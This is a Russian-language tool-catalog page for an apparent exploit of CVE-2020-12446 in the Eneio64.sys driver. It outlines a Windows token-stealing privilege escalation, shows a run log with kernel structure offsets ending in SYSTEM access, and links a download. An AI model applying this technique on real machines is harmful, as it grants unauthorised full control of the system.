Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Eneio64-LPE — Эксплойт для CVE-2020-12446 и Eneio64.sys. Использует superfetch для трансляции адресов. | Kitploit
Инструменты/GitHubGitHub/s1lkys/eneio64-lpe
Повышение привилегийЭксплуатацияОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

Эксплойт для CVE-2020-12446 и Eneio64.sys. Использует superfetch для трансляции адресов.

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
  1. Открывает дескриптор уязвимого драйвера
  2. Отображает физическую память в пользовательское пространство
  3. Открывает дескриптор процесса System
  4. Запрашивает таблицу SystemHandleInformation текущего процесса для получения дескриптора системы, раскрывая его адрес EPROCESS.
  5. Проходит по связи ActiveProcessLinks EPROCESS системы (flink), пока не будет найден PID текущего процесса.
  6. Заменяет токен текущего процесса токеном процесса System
  7. Запускает новый процесс powershell.

Использует метод superfetch для преобразования виртуального адреса в физический вместо утечки CR3 и обхода таблиц страниц.

Протестировано на Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

Только для образовательных целей!

Скачать инструмент